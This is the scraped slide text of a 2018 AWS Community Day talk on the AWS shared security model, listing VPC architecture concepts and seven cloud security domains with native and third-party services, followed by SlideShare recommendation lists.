SlideShare a Scribd company logo

AWS Security 101: Understanding the Shared Security Model - Jeff Westphal, Milwaukee

AWS Chicago
AWS Chicago

AWS Community Day | Midwest 2018 Track 1 AWS Security 101: Understanding the Shared Security Model - Jeff Westphal, Milwaukee

Technology
1 of 25
Download to read offline
Jeff Westphal - Milwaukee and Madison AWS uGroup Leader AWS Security 101: Understanding the Shared Security Model
@ClashofCoders
PROD-VPC Public Subnet Instances IGW Private Subnet Instances DEV-VPC Public Subnet Instances IGW Private Subnet Instances Security Group RDS USEast S3 Buckets Fundamental Concepts in AWS Network • VPC • Public/Private Subnets • Security Groups • NACLs • Availability Zones Identity and Access • IAM • Users/Groups • Permissions • MFA Data and Compute • EC2 • EBS • S3 • CloudTrail • CloudWatch ELB USEast-1A
Route 53Al Gore Shield DDOS Protection WAF
Demand Increases Clash of Coders
VPC-A Public Subnet Instances IGW Private Subnet Instances VPC-B Public Subnet Instances IGW Private Subnet Instances IAM Account A Services VPC Private Subnet Instances Availability Zone Security Group RDS Private Subnet Security Group Elastic IP AutoscalingVPC NAT Gateway ELB VPC Peer VPC Peer AWS Region A VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region B VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region C IAM Account B VPC Peer VPN Gateway S3 Buckets
VPC-A Public Subnet Instances IGW Private Subnet Instances VPC-B Public Subnet Instances IGW Private Subnet Instances IAM Account A Services VPC Private Subnet Instances Availability Zone Security Group RDS Private Subnet Security Group Elastic IP AutoscalingVPC NAT Gateway ELB VPC Peer VPC Peer AWS Region A VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region B VPC-B Public Subnet Instances IGW Private Subnet Instances AWS Region C IAM Account B VPC Peer VPN Gateway S3 Buckets
What’s Missing?
AWS and you share responsibility for security AWS Foundation Services Compute Storage Database Networking AWS Global Infrastructure Regions Availability Zones Edge Locations Identity & Access Control Network Security Customer applications, Operating Systems & content You get to define your controls ON the Cloud AWS takes care of the security OF the Cloud You Inventory & Config Data Encryption
Copyright 2018 Trend Micro Inc.10 Why do I need additional security in the cloud? Threats: • Network attack • Vulnerabilities • Malware • Insider threats Compliance: • PCI DSS • HIPAA • NIST • Internal
Route 53Al Gore Shield Security at Scale WAF
Copyright 2018 Trend Micro Inc.12 The 7 Security Domains of the Cloud Security Model 1. Network 2. Identity & Access Mgmt 3. Data 4. Visibility 5. Governance Rick & Compliance 6. Threat & Vulnerability Protection 7. Application Security
Copyright 2018 Trend Micro Inc.13 Security Domain 1 – Network Security Native Services • VPC • NACLs, Security Groups • VPN, Direct Connect • VPC Peering • Public/Private Subnets • ELB/ALB Third-Party Services: • Next-Gen Firewall • CASB • Software Defined Perimeter
Copyright 2018 Trend Micro Inc.14 Security Domain 2 – Identity and Access Management Native Services • IAM • MFA • SAML • STS • Directory Services • AWS Organizations Third-Party Services: • LDAP • SAML • SSO
Copyright 2018 Trend Micro Inc.15 Security Domain 3 – Data Native Services • Encryption- KMS • Cloud HSM • Macie • Guard Duty Third-Party Services: • DLP • Integrity Monitoring • Log Inspection
Copyright 2018 Trend Micro Inc.16 Security Domain 4 – Visibility Native Services • CloudTrail • CloudWatch • SNS • Trusted Advisor Third-Party Services: • SIEM • Log Intelligence • Perimeter Assessments
Copyright 2018 Trend Micro Inc.17 Security Domain 5 – Governance & Compliance Native Services • CloudTrail • CloudWatch • Config • AWS Quick Starts Third-Party Services: • Best-Practice Checks • Charge Monitoring • Customized Alerts
Copyright 2018 Trend Micro Inc.18 Security Domain 6 – Threat and Incident Detection and Response Native Services • VPC • Security Groups, NACLs • WAF • Shield • Inspector Third-Party Services: • Intrusion Prevention • Deep Packet Inspection • Malware, Antivirus • Zero Day/Hour Protection • Case Management
Copyright 2018 Trend Micro Inc.19 Security Domain 7 – Application Security Native Services • Inspector • WAF • API Gateway • Cognito Third-Party Services: • CVE Checks • Host-Based Security Controls • Application Control • Vulnerability Scanning
Clash of Coders
CloudFront DynamoDB SNS Mobile Notifications ALB ECR Kinesis Streams Lambda Functions ElastiCache Cluster Lambda Functions Game Updates Mobile Users S3 Bucket Static Content Internet Gateway CodeCommit ECR CodeBuild Lambda Functions Developer Serverless and Event Driven Architectures
CloudFront DynamoDB SNS Mobile Notifications ALB ECR Kinesis Streams Lambda Functions ElastiCache Cluster Lambda Functions Game Updates Mobile Users S3 Bucket Static Content Internet Gateway CodeCommit ECR CodeBuild Lambda Functions Developer Serverless and Event Driven Architectures
Copyright 2017 Trend Micro Inc.23 Integrated Protection through the entire Application Lifecycle BuildCommit Scan Alert DeployPush Sign/Promote Examine • Malware • Vulnerabilities • Custom IOCs APIs Signed
Copyright 2018 Trend Micro Inc.24 7 Security Domains OSI Model • Physical • Data Link • Network • Transport • Session • Presentation • Application Cloud Security Model • Network • Identity & Access Mgmt • Data • Visibility • Governance Rick/Compliance • Threat, Vulnerability Protection • Application Security Please Do Not Throw Sausage Pizza Away ? ? ? ? ? ? ? @mkeaws
Thank you!!! Hope to see everyone at Happy Hour!

Recommended

Why Isn't the Cloud Cheaper - John Merline, Milwaukee
Why Isn't the Cloud Cheaper - John Merline, Milwaukee Why Isn't the Cloud Cheaper - John Merline, Milwaukee
Why Isn't the Cloud Cheaper - John Merline, Milwaukee
AWS Chicago
 
Nested Beanstalk Deployment - Brett Sutter, Minneapolis
Nested Beanstalk Deployment - Brett Sutter, Minneapolis Nested Beanstalk Deployment - Brett Sutter, Minneapolis
Nested Beanstalk Deployment - Brett Sutter, Minneapolis
AWS Chicago
 
Learn about AWS Certifications - Andrew May, Columbus
Learn about AWS Certifications - Andrew May, ColumbusLearn about AWS Certifications - Andrew May, Columbus
Learn about AWS Certifications - Andrew May, Columbus
AWS Chicago
 
Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys...
Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys... Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys...
Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys...
AWS Chicago
 
Enabling High Performance IT with 2nd Watch, Docker & AWS
Enabling High Performance IT with 2nd Watch, Docker & AWSEnabling High Performance IT with 2nd Watch, Docker & AWS
Enabling High Performance IT with 2nd Watch, Docker & AWS
2nd Watch
 
Serverless Architectures on AWS - Pop-up Loft Tel Aviv
Serverless Architectures on AWS - Pop-up Loft Tel AvivServerless Architectures on AWS - Pop-up Loft Tel Aviv
Serverless Architectures on AWS - Pop-up Loft Tel Aviv
Amazon Web Services
 
Multi-Account Strategy At Scale - Nick Bausch, Chicago
Multi-Account Strategy At Scale - Nick Bausch, ChicagoMulti-Account Strategy At Scale - Nick Bausch, Chicago
Multi-Account Strategy At Scale - Nick Bausch, Chicago
AWS Chicago
 
Mastering your Cloud Consumption - Pop-up Loft Tel Aviv
Mastering your Cloud Consumption - Pop-up Loft Tel AvivMastering your Cloud Consumption - Pop-up Loft Tel Aviv
Mastering your Cloud Consumption - Pop-up Loft Tel Aviv
Amazon Web Services
 

Recommended

Why Isn't the Cloud Cheaper - John Merline, Milwaukee
Why Isn't the Cloud Cheaper - John Merline, Milwaukee Why Isn't the Cloud Cheaper - John Merline, Milwaukee
Why Isn't the Cloud Cheaper - John Merline, Milwaukee
AWS Chicago
 
Nested Beanstalk Deployment - Brett Sutter, Minneapolis
Nested Beanstalk Deployment - Brett Sutter, Minneapolis Nested Beanstalk Deployment - Brett Sutter, Minneapolis
Nested Beanstalk Deployment - Brett Sutter, Minneapolis
AWS Chicago
 
Learn about AWS Certifications - Andrew May, Columbus
Learn about AWS Certifications - Andrew May, ColumbusLearn about AWS Certifications - Andrew May, Columbus
Learn about AWS Certifications - Andrew May, Columbus
AWS Chicago
 
Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys...
Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys... Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys...
Elastic.co's ELK Stack - Platform Agnostic Immutable Infrastructure & Analys...
AWS Chicago
 
Enabling High Performance IT with 2nd Watch, Docker & AWS
Enabling High Performance IT with 2nd Watch, Docker & AWSEnabling High Performance IT with 2nd Watch, Docker & AWS
Enabling High Performance IT with 2nd Watch, Docker & AWS
2nd Watch
 
Serverless Architectures on AWS - Pop-up Loft Tel Aviv
Serverless Architectures on AWS - Pop-up Loft Tel AvivServerless Architectures on AWS - Pop-up Loft Tel Aviv
Serverless Architectures on AWS - Pop-up Loft Tel Aviv
Amazon Web Services
 
Multi-Account Strategy At Scale - Nick Bausch, Chicago
Multi-Account Strategy At Scale - Nick Bausch, ChicagoMulti-Account Strategy At Scale - Nick Bausch, Chicago
Multi-Account Strategy At Scale - Nick Bausch, Chicago
AWS Chicago
 
Mastering your Cloud Consumption - Pop-up Loft Tel Aviv
Mastering your Cloud Consumption - Pop-up Loft Tel AvivMastering your Cloud Consumption - Pop-up Loft Tel Aviv
Mastering your Cloud Consumption - Pop-up Loft Tel Aviv
Amazon Web Services
 
Building PCI Compliance Solution on AWS - Pop-up Loft Tel Aviv
Building PCI Compliance Solution on AWS - Pop-up Loft Tel AvivBuilding PCI Compliance Solution on AWS - Pop-up Loft Tel Aviv
Building PCI Compliance Solution on AWS - Pop-up Loft Tel Aviv
Amazon Web Services
 
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Amazon Web Services
 
Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra
Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra
Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra
Amazon Web Services
 
Containers on AWS
Containers on AWSContainers on AWS
Containers on AWS
AWS Riyadh User Group
 
2nd Watch CTO - Kris Blisner
2nd Watch CTO - Kris Blisner2nd Watch CTO - Kris Blisner
2nd Watch CTO - Kris Blisner
Hostway|HOSTING
 
Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...
Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...
Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...
Amazon Web Services
 
Amazon relational database service (rds)
Amazon relational database service (rds)Amazon relational database service (rds)
Amazon relational database service (rds)
AWS Riyadh User Group
 
AWS Kinesis
AWS KinesisAWS Kinesis
AWS Kinesis
Julian Kleinhans
 
EC2 and S3 Level 100
EC2 and S3 Level 100EC2 and S3 Level 100
EC2 and S3 Level 100
AWS Riyadh User Group
 
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with IntelWKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
Amazon Web Services
 
How to Secure your Hybrid Enviroment - Pop-up Loft Tel Aviv
How to Secure your Hybrid Enviroment - Pop-up Loft Tel AvivHow to Secure your Hybrid Enviroment - Pop-up Loft Tel Aviv
How to Secure your Hybrid Enviroment - Pop-up Loft Tel Aviv
Amazon Web Services
 
Reactive Cloud Security | AWS Public Sector Summit 2016
Reactive Cloud Security | AWS Public Sector Summit 2016Reactive Cloud Security | AWS Public Sector Summit 2016
Reactive Cloud Security | AWS Public Sector Summit 2016
Amazon Web Services
 
Big data and Analytics on AWS
Big data and Analytics on AWSBig data and Analytics on AWS
Big data and Analytics on AWS
2nd Watch
 
Cloud comparison - AWS vs Azure vs Google
Cloud comparison - AWS vs Azure vs GoogleCloud comparison - AWS vs Azure vs Google
Cloud comparison - AWS vs Azure vs Google
Patrick Pierson
 
AWS Greengrass Technical Deep Dive - AWS Online Tech Talks
AWS Greengrass Technical Deep Dive - AWS Online Tech TalksAWS Greengrass Technical Deep Dive - AWS Online Tech Talks
AWS Greengrass Technical Deep Dive - AWS Online Tech Talks
Amazon Web Services
 
AWS re:Invent 2021 Recap by APN Ambassador
AWS re:Invent 2021 Recap by APN AmbassadorAWS re:Invent 2021 Recap by APN Ambassador
AWS re:Invent 2021 Recap by APN Ambassador
kloia
 
Reinvent recap
Reinvent recapReinvent recap
Reinvent recap
Jason Poley
 
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
Amazon Web Services
 
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Amazon Web Services
 
AWS Summit Berlin 2013 - Big Data Analytics
AWS Summit Berlin 2013 - Big Data AnalyticsAWS Summit Berlin 2013 - Big Data Analytics
AWS Summit Berlin 2013 - Big Data Analytics
AWS Germany
 
CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
Amazon Web Services
 
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend MicroAWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
Amazon Web Services
 

More Related Content

What's hot

Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Amazon Web Services
 
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with IntelWKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
Amazon Web Services
 
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
Amazon Web Services
 
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Amazon Web Services
 

What's hot (20)

Building PCI Compliance Solution on AWS - Pop-up Loft Tel Aviv
Building PCI Compliance Solution on AWS - Pop-up Loft Tel AvivBuilding PCI Compliance Solution on AWS - Pop-up Loft Tel Aviv
Building PCI Compliance Solution on AWS - Pop-up Loft Tel Aviv
 
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
Real-world High Performance & High Throughput Computing on AWS - AWS PS Summi...
 
Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra
Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra
Evolution of Geospatial Workloads on AWS - AWS PS Summit Canberra
 
Containers on AWS
Containers on AWSContainers on AWS
Containers on AWS
 
2nd Watch CTO - Kris Blisner
2nd Watch CTO - Kris Blisner2nd Watch CTO - Kris Blisner
2nd Watch CTO - Kris Blisner
 
Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...
Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...
Introducing and Benefits of Ultra Fast Cloud Direct Connectivity to and from ...
 
Amazon relational database service (rds)
Amazon relational database service (rds)Amazon relational database service (rds)
Amazon relational database service (rds)
 
AWS Kinesis
AWS KinesisAWS Kinesis
AWS Kinesis
 
EC2 and S3 Level 100
EC2 and S3 Level 100EC2 and S3 Level 100
EC2 and S3 Level 100
 
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with IntelWKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
WKS420 Create an IoT Gateway & Establish a Data Pipeline to AWS IoT with Intel
 
How to Secure your Hybrid Enviroment - Pop-up Loft Tel Aviv
How to Secure your Hybrid Enviroment - Pop-up Loft Tel AvivHow to Secure your Hybrid Enviroment - Pop-up Loft Tel Aviv
How to Secure your Hybrid Enviroment - Pop-up Loft Tel Aviv
 
Reactive Cloud Security | AWS Public Sector Summit 2016
Reactive Cloud Security | AWS Public Sector Summit 2016Reactive Cloud Security | AWS Public Sector Summit 2016
Reactive Cloud Security | AWS Public Sector Summit 2016
 
Big data and Analytics on AWS
Big data and Analytics on AWSBig data and Analytics on AWS
Big data and Analytics on AWS
 
Cloud comparison - AWS vs Azure vs Google
Cloud comparison - AWS vs Azure vs GoogleCloud comparison - AWS vs Azure vs Google
Cloud comparison - AWS vs Azure vs Google
 
AWS Greengrass Technical Deep Dive - AWS Online Tech Talks
AWS Greengrass Technical Deep Dive - AWS Online Tech TalksAWS Greengrass Technical Deep Dive - AWS Online Tech Talks
AWS Greengrass Technical Deep Dive - AWS Online Tech Talks
 
AWS re:Invent 2021 Recap by APN Ambassador
AWS re:Invent 2021 Recap by APN AmbassadorAWS re:Invent 2021 Recap by APN Ambassador
AWS re:Invent 2021 Recap by APN Ambassador
 
Reinvent recap
Reinvent recapReinvent recap
Reinvent recap
 
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
AWS re:Invent 2016: Running Lean Architectures: How to Optimize for Cost Effi...
 
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
Cloud Backup & Recovery Options with AWS Partner Solutions - June 2017 AWS On...
 
AWS Summit Berlin 2013 - Big Data Analytics
AWS Summit Berlin 2013 - Big Data AnalyticsAWS Summit Berlin 2013 - Big Data Analytics
AWS Summit Berlin 2013 - Big Data Analytics
 

Similar to AWS Security 101: Understanding the Shared Security Model - Jeff Westphal, Milwaukee

CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
Amazon Web Services
 
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend MicroAWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
Amazon Web Services
 
A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...
A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...
A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...
Amazon Web Services
 
Datensicherheit mit AWS - AWS Security Web Day
Datensicherheit mit AWS - AWS Security Web DayDatensicherheit mit AWS - AWS Security Web Day
Datensicherheit mit AWS - AWS Security Web Day
AWS Germany
 
Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018
Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018
Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018
Amazon Web Services
 
[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure
[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure
[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure
OWASP
 
Getting Started with AWS Security
Getting Started with AWS SecurityGetting Started with AWS Security
Getting Started with AWS Security
Amazon Web Services
 
3 Secrets to Becoming a Cloud Security Superhero
3 Secrets to Becoming a Cloud Security Superhero3 Secrets to Becoming a Cloud Security Superhero
3 Secrets to Becoming a Cloud Security Superhero
Amazon Web Services
 

Similar to AWS Security 101: Understanding the Shared Security Model - Jeff Westphal, Milwaukee (20)

CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
CJIS Evidence Management in the Cloud using AWS GovCloud (US) | AWS Public Se...
 
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend MicroAWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
AWS April Webianr Series - How Willbros Builds Securely in AWS with Trend Micro
 
AWS Security Architecture - Overview
AWS Security Architecture - OverviewAWS Security Architecture - Overview
AWS Security Architecture - Overview
 
A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...
A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...
A 360-Degree Cloud-Native Approach to Secure Your AWS Cloud Stack (SEC313-S) ...
 
Datensicherheit mit AWS - AWS Security Web Day
Datensicherheit mit AWS - AWS Security Web DayDatensicherheit mit AWS - AWS Security Web Day
Datensicherheit mit AWS - AWS Security Web Day
 
Cloud Breach - Forensics Audit Planning
Cloud Breach - Forensics Audit PlanningCloud Breach - Forensics Audit Planning
Cloud Breach - Forensics Audit Planning
 
Building A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for ScaleBuilding A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for Scale
 
Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018
Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018
Securing Serverless Applications and AWS Lambda (SRV314-R1) - AWS re:Invent 2018
 
[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure
[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure
[OPD 2019] Storm Busters: Auditing & Securing AWS Infrastructure
 
Understanding AWS Security
Understanding AWS SecurityUnderstanding AWS Security
Understanding AWS Security
 
Staying Secure in the Cloud
Staying Secure in the CloudStaying Secure in the Cloud
Staying Secure in the Cloud
 
AWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS Security
 
(SEC401) Encryption Key Storage with AWS KMS at Okta
(SEC401) Encryption Key Storage with AWS KMS at Okta(SEC401) Encryption Key Storage with AWS KMS at Okta
(SEC401) Encryption Key Storage with AWS KMS at Okta
 
Automating AWS security and compliance
Automating AWS security and compliance Automating AWS security and compliance
Automating AWS security and compliance
 
Getting Started with AWS Security
Getting Started with AWS SecurityGetting Started with AWS Security
Getting Started with AWS Security
 
Alert Logic
Alert LogicAlert Logic
Alert Logic
 
Tour to Azure Security Center
Tour to Azure Security CenterTour to Azure Security Center
Tour to Azure Security Center
 
Cloud Security for Regulated Firms - Securing my cloud and proving it
Cloud Security for Regulated Firms - Securing my cloud and proving itCloud Security for Regulated Firms - Securing my cloud and proving it
Cloud Security for Regulated Firms - Securing my cloud and proving it
 
Unified Protection for Multi-Cloud Infrastructure
Unified Protection for Multi-Cloud InfrastructureUnified Protection for Multi-Cloud Infrastructure
Unified Protection for Multi-Cloud Infrastructure
 
3 Secrets to Becoming a Cloud Security Superhero
3 Secrets to Becoming a Cloud Security Superhero3 Secrets to Becoming a Cloud Security Superhero
3 Secrets to Becoming a Cloud Security Superhero
 

More from AWS Chicago

More from AWS Chicago (20)

AWS reInvent 2023 recaps from Chicago AWS user group
AWS reInvent 2023 recaps from Chicago AWS user groupAWS reInvent 2023 recaps from Chicago AWS user group
AWS reInvent 2023 recaps from Chicago AWS user group
 
Chicago AWS Solutions Architect Mehdy Haghy recaps the new AI/ML releases and...
Chicago AWS Solutions Architect Mehdy Haghy recaps the new AI/ML releases and...Chicago AWS Solutions Architect Mehdy Haghy recaps the new AI/ML releases and...
Chicago AWS Solutions Architect Mehdy Haghy recaps the new AI/ML releases and...
 
WilliamCollins_Road-to-Transit-Gateway.pptx
WilliamCollins_Road-to-Transit-Gateway.pptxWilliamCollins_Road-to-Transit-Gateway.pptx
WilliamCollins_Road-to-Transit-Gateway.pptx
 
Suresh Poopandi_Generative AI On AWS-MidWestCommunityDay-Final.pdf
Suresh Poopandi_Generative AI On AWS-MidWestCommunityDay-Final.pdfSuresh Poopandi_Generative AI On AWS-MidWestCommunityDay-Final.pdf
Suresh Poopandi_Generative AI On AWS-MidWestCommunityDay-Final.pdf
 
Streamlined Entitlements with AWS Lake Formation - Anusha Dwivedula
Streamlined Entitlements with AWS Lake Formation - Anusha DwivedulaStreamlined Entitlements with AWS Lake Formation - Anusha Dwivedula
Streamlined Entitlements with AWS Lake Formation - Anusha Dwivedula
 
Steve Seaney_AWS Control Tower - 2023 Midwest Community Day - Final.pptx
Steve Seaney_AWS Control Tower - 2023 Midwest Community Day - Final.pptxSteve Seaney_AWS Control Tower - 2023 Midwest Community Day - Final.pptx
Steve Seaney_AWS Control Tower - 2023 Midwest Community Day - Final.pptx
 
Saurabh_Shanbhag - Building_SaaS_on_AWS.pptx
Saurabh_Shanbhag - Building_SaaS_on_AWS.pptxSaurabh_Shanbhag - Building_SaaS_on_AWS.pptx
Saurabh_Shanbhag - Building_SaaS_on_AWS.pptx
 
Sanket_Nasre_Simplify Modernization.pdf
Sanket_Nasre_Simplify Modernization.pdfSanket_Nasre_Simplify Modernization.pdf
Sanket_Nasre_Simplify Modernization.pdf
 
Ross Stuart_Using ML to Solve Lifes Problems.pptx
Ross Stuart_Using ML to Solve Lifes Problems.pptxRoss Stuart_Using ML to Solve Lifes Problems.pptx
Ross Stuart_Using ML to Solve Lifes Problems.pptx
 
robsable_Enhancing DevOps Practices with CloudWatch APM FINAL.pdf
robsable_Enhancing DevOps Practices with CloudWatch APM FINAL.pdfrobsable_Enhancing DevOps Practices with CloudWatch APM FINAL.pdf
robsable_Enhancing DevOps Practices with CloudWatch APM FINAL.pdf
 
Sanket_Nasre_Simplify Modernization.pdf
Sanket_Nasre_Simplify Modernization.pdfSanket_Nasre_Simplify Modernization.pdf
Sanket_Nasre_Simplify Modernization.pdf
 
Mohamed Wali_AWS Security Reference Architecture.pptx
Mohamed Wali_AWS Security Reference Architecture.pptxMohamed Wali_AWS Security Reference Architecture.pptx
Mohamed Wali_AWS Security Reference Architecture.pptx
 
Nick-Walter-HOB_Migrating_Dinosaurs.pptx
Nick-Walter-HOB_Migrating_Dinosaurs.pptxNick-Walter-HOB_Migrating_Dinosaurs.pptx
Nick-Walter-HOB_Migrating_Dinosaurs.pptx
 
Pat_Davies_AWSCostOptimization_Final.pdf
Pat_Davies_AWSCostOptimization_Final.pdfPat_Davies_AWSCostOptimization_Final.pdf
Pat_Davies_AWSCostOptimization_Final.pdf
 
MARK GAMBLE_ASC For Really Remote Edge Computing - AWS Community Day Chicago ...
MARK GAMBLE_ASC For Really Remote Edge Computing - AWS Community Day Chicago ...MARK GAMBLE_ASC For Really Remote Edge Computing - AWS Community Day Chicago ...
MARK GAMBLE_ASC For Really Remote Edge Computing - AWS Community Day Chicago ...
 
MichaelSoule-UsingJupyterNotebooks.pptx
MichaelSoule-UsingJupyterNotebooks.pptxMichaelSoule-UsingJupyterNotebooks.pptx
MichaelSoule-UsingJupyterNotebooks.pptx
 
Michal Brygidyn_CloudHackingScenarios.pdf
Michal Brygidyn_CloudHackingScenarios.pdfMichal Brygidyn_CloudHackingScenarios.pdf
Michal Brygidyn_CloudHackingScenarios.pdf
 
Kamil Kolodziejski_Structura-AWS.pptx
Kamil Kolodziejski_Structura-AWS.pptxKamil Kolodziejski_Structura-AWS.pptx
Kamil Kolodziejski_Structura-AWS.pptx
 
John Merline AWS Certification FAQ.pptx
John Merline AWS Certification FAQ.pptxJohn Merline AWS Certification FAQ.pptx
John Merline AWS Certification FAQ.pptx
 
JuliaFMorgado_Breaking_bad_habits.pptx
JuliaFMorgado_Breaking_bad_habits.pptxJuliaFMorgado_Breaking_bad_habits.pptx
JuliaFMorgado_Breaking_bad_habits.pptx
 

Recently uploaded

Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
